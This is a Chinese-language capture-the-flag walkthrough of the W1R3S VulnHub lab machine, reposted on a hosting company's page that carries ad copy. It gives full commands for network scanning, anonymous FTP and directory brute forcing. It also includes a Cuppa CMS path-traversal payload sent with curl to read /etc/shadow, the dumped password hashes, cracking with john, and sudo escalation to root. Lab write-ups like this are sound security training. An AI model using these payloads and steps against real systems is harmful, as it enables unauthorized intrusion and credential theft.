靶機(jī)地址：https://www.vulnhub.com/entry/w1r3s-101,220/
下載地址：https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

“只有客戶(hù)發(fā)展了，才有我們的生存與發(fā)展！”這是成都創(chuàng)新互聯(lián)的服務(wù)宗旨！把網(wǎng)站當(dāng)作互聯(lián)網(wǎng)產(chǎn)品，產(chǎn)品思維更注重全局思維、需求分析和迭代思維，在網(wǎng)站建設(shè)中就是為了建設(shè)一個(gè)不僅審美在線(xiàn)，而且實(shí)用性極高的網(wǎng)站。創(chuàng)新互聯(lián)對(duì)做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)、網(wǎng)站制作、網(wǎng)站開(kāi)發(fā)、網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站優(yōu)化、網(wǎng)絡(luò)推廣、探索永無(wú)止境。

確定靶機(jī)網(wǎng)段
ip a

確定靶機(jī)IP（掃描C段/B段，此時(shí)為校園網(wǎng)）->10.170.19.36
sudo nmap -sn 10.170.0.0/16或sudo netdiscover -i eth0 -r 10.170.0.0/16

全面探測(cè)端口（建議至少掃兩遍）（kali中掃描小于1024端口的操作需要系統(tǒng)權(quán)限）
可以用以下命令（-sS：半開(kāi)掃描需要root權(quán)限；-n：不做DNS解析(快速掃描)；-p-：所有端口；--max-retries=0：重傳設(shè)定為0，速度更快，可能會(huì)丟失部分?jǐn)?shù)據(jù)；-Pn：非ping掃描，不執(zhí)行主機(jī)發(fā)現(xiàn)，可以跳過(guò)防火墻。
sudo nmap -n -v -sS -p- 10.170.19.36 --min-rate=10000 --max-retries=0 -oN allports.txt -Pn
查看打印的報(bào)告allports.txt

再調(diào)用默認(rèn)插件對(duì)打印出的報(bào)告里的端口進(jìn)行掃描，grep ^[0-9]正則匹配數(shù)字開(kāi)頭；cut -d / -f1指以/分割，取第一部分，如21/tcp取21；tr '\n' ','換行換成,；sed s/,$//將結(jié)尾的,替換為空。
nmap -n -v -sC -sV -p $(cat allports.txt | grep ^[0-9] |cut -d / -f1 | tr '\n' ',' | sed s/,$//) 10.170.19.36 -oN nmap.txt -Pn

按照一定的順序來(lái)逐個(gè)排查端口：如21 ->80 ->3306 ->22

檢查21端口
嘗試匿名登陸
ftp 10.170.19.36

查看當(dāng)前目錄
dir/ls

依次cd進(jìn)目錄，mget(多個(gè)文件)/get(單個(gè)文件)，下載里面的文件，bye退出
注：下載前，輸入binary命令（ Binary模式不會(huì)對(duì)數(shù)據(jù)進(jìn)行任何處理；Ascii模式會(huì)將回車(chē)換行轉(zhuǎn)換為本機(jī)的回車(chē)字符），防止傳輸后的文件被破壞
ls -lt按照時(shí)間查看下載到本地的文件

cat -n *.txt打開(kāi)所有文件查看
01ec2d8fc11c493b25029fb1f47f39ce->明顯是MD5，可以用hash-identifier識(shí)別一下

拿去hashes.com解密
01ec2d8fc11c493b25029fb1f47f39ce:This is not a password
另一條是
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==->base 64
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==:It is easy, but not that easy..
都沒(méi)什么用
還有一些員工信息，包括姓名、職位，可以用來(lái)構(gòu)造字典，

其他的一些信息，看起來(lái)是順序顛倒的，肉眼能看出其是上下左右顛倒，大概能讀出意思

去搜一下關(guān)于顛倒文本的網(wǎng)站，解密一下
第一句是filp

第二句是flip+ reverse

都沒(méi)啥用，花費(fèi)了不少時(shí)間在ftp上面，接下來(lái)?yè)Q一種方式

檢查80端口
先上目錄掃描工具
第一種工具：gobuster
sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.170.19.36/

包括/administrator，/javascript，/wordpress等
第二種工具：feroxbuster，可以?huà)叨嗉?jí)目錄

進(jìn)入http://10.170.19.36/administrator跳轉(zhuǎn)到/administrator/installation/
標(biāo)題顯示為Cuppa CMS

搜索有沒(méi)有Cuppa CMS的漏洞可以利用
searchsploit cuppa cms

下載該文件
searchsploit cuppa cms -m 25971
查看該文件，是PHP代碼注入，其中urlConfig參數(shù)有文件包含漏洞

利用的實(shí)例如下

看到feroxbuster掃出二級(jí)目錄/administrator/alerts，根據(jù)樣例，這里我們構(gòu)造http://10.170.19.36/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
但是以GET方式直接訪問(wèn)顯示不全

嘗試以POST方式訪問(wèn)

還可以用curl post數(shù)據(jù)訪問(wèn)，這里嘗試訪問(wèn)shadow文件，將結(jié)果存入到hash文件中
curl --data urlConfig=../../../../../../../../../etc/shadow http://10.170.19.36/administrator/alerts/alertConfigField.php -o hash
得到3個(gè)賬號(hào)密碼，開(kāi)始的 6 6 6位為加密標(biāo)志，后面8位為salt，后面的為hash
（$6開(kāi)頭表示是SHA-512加密，$1是MD5，$5是SHA-256）
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
使用john破解hash
john hash

拿到密碼，嘗試ssh連接
ssh w1r3s@10.170.19.36
然后執(zhí)行sudo -l，看到下面的(ALL : ALL) ALL，表明該用戶(hù)可以執(zhí)行任何指令

執(zhí)行sudo su -，直接來(lái)到root主目錄，拿到flag

1670244109857)]
執(zhí)行sudo su -，直接來(lái)到root主目錄，拿到flag
[外鏈圖片轉(zhuǎn)存中…(img-fZownBFc-1670244109857)]

你是否還在尋找穩(wěn)定的海外服務(wù)器提供商？創(chuàng)新互聯(lián)www.cdcxhl.cn海外機(jī)房具備T級(jí)流量清洗系統(tǒng)配攻擊溯源，準(zhǔn)確流量調(diào)度確保服務(wù)器高可用性，企業(yè)級(jí)服務(wù)器適合批量采購(gòu)，新人活動(dòng)首月15元起，快前往官網(wǎng)查看詳情吧

網(wǎng)站欄目：W1R3S-VulnHub（漏洞靶機(jī)滲透測(cè)試）-創(chuàng)新互聯(lián)
轉(zhuǎn)載注明：http://weahome.cn/article/iepod.html